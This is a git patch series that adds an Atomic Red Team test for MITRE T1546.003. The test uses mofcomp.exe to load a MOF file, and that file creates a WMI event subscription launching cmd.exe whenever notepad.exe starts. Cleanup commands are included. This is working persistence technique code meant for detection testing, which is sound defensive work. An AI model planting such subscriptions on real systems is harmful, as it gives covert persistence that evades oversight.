From 76ef8e6e11cf89ae720731279770f036e64f8082 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Tue, 19 Jul 2022 07:47:26 -0600 Subject: [PATCH 1/2] Adding MOFComp to T1546.003 --- atomics/T1546.003/T1546.003.yaml | 39 ++++++++++++++++++++++++++++- atomics/T1546.003/src/T1546.003.mof | 22 ++++++++++++++++ 2 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 atomics/T1546.003/src/T1546.003.mof diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml index 8c365a9e..3b72fc1c 100644 --- a/atomics/T1546.003/T1546.003.yaml +++ b/atomics/T1546.003/T1546.003.yaml @@ -81,4 +81,41 @@ atomic_tests: $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true +- name: Windows MOFComp.exe Load MOF File + description: | + The following Atomic will utilize MOFComp.exe to load a local MOF file. + The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. + To query for the class: gwmi __eventfilter -namespace root\subscription + A successful execution will add the class to WMI root namespace. + Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/. + supported_platforms: + - windows + input_arguments: + mofcomp_path: + description: Location of mofcomp.exe + type: String + default: c:\windows\system32\wbem\mofcomp.exe + mof_file: + description: Local location MOF file + type: String + default: PathToAtomicsFolder\T1546.003\src\T1546.003.mof + dependency_executor_name: powershell + dependencies: + - description: | + MofComp.exe must exist on disk at specified location (#{mofcomp_path}) + prereq_command: | + if (Test-Path "#{mofcomp_path}") { exit 0} else { exit 1} + get_prereq_command: | + Validate MOFComp.exe is on disk somewhere and update input argument. + executor: + command: | + #{mofcomp_path} #{mof_file} + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam_consumer'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam_filter'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell \ No newline at end of file diff --git a/atomics/T1546.003/src/T1546.003.mof b/atomics/T1546.003/src/T1546.003.mof new file mode 100644 index 00000000..4a80a2b0 --- /dev/null +++ b/atomics/T1546.003/src/T1546.003.mof @@ -0,0 +1,22 @@ +#PRAGMA AUTORECOVER +#PRAGMA NAMESPACE ("\\\\.\\root\\subscription") +instance of CommandLineEventConsumer as $Cons +{ + Name = "AtomicRedTeam_consumer"; + RunInteractively=false; + CommandLineTemplate="cmd.exe"; +}; +instance of __EventFilter as $Filt +{ + Name = "AtomicRedTeam_filter"; + EventNamespace = "root\\subscription"; + Query ="SELECT * FROM __InstanceCreationEvent Within 3" + "Where TargetInstance Isa \"Win32_Process\" " + "And Targetinstance.Name = \"notepad.exe\" "; + QueryLanguage = "WQL"; +}; +instance of __FilterToConsumerBinding +{ + Filter = $Filt; + Consumer = $Cons; +}; \ No newline at end of file From f230160f64ad4447bc72ed434d37bba9f0865e6a Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Tue, 19 Jul 2022 07:58:51 -0700 Subject: [PATCH 2/2] Update T1546.003.mof --- atomics/T1546.003/src/T1546.003.mof | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1546.003/src/T1546.003.mof b/atomics/T1546.003/src/T1546.003.mof index 4a80a2b0..6cae489f 100644 --- a/atomics/T1546.003/src/T1546.003.mof +++ b/atomics/T1546.003/src/T1546.003.mof @@ -10,7 +10,7 @@ instance of __EventFilter as $Filt { Name = "AtomicRedTeam_filter"; EventNamespace = "root\\subscription"; - Query ="SELECT * FROM __InstanceCreationEvent Within 3" + Query ="SELECT * FROM __InstanceCreationEvent Within 3 " "Where TargetInstance Isa \"Win32_Process\" " "And Targetinstance.Name = \"notepad.exe\" "; QueryLanguage = "WQL"; @@ -19,4 +19,4 @@ instance of __FilterToConsumerBinding { Filter = $Filt; Consumer = $Cons; -}; \ No newline at end of file +};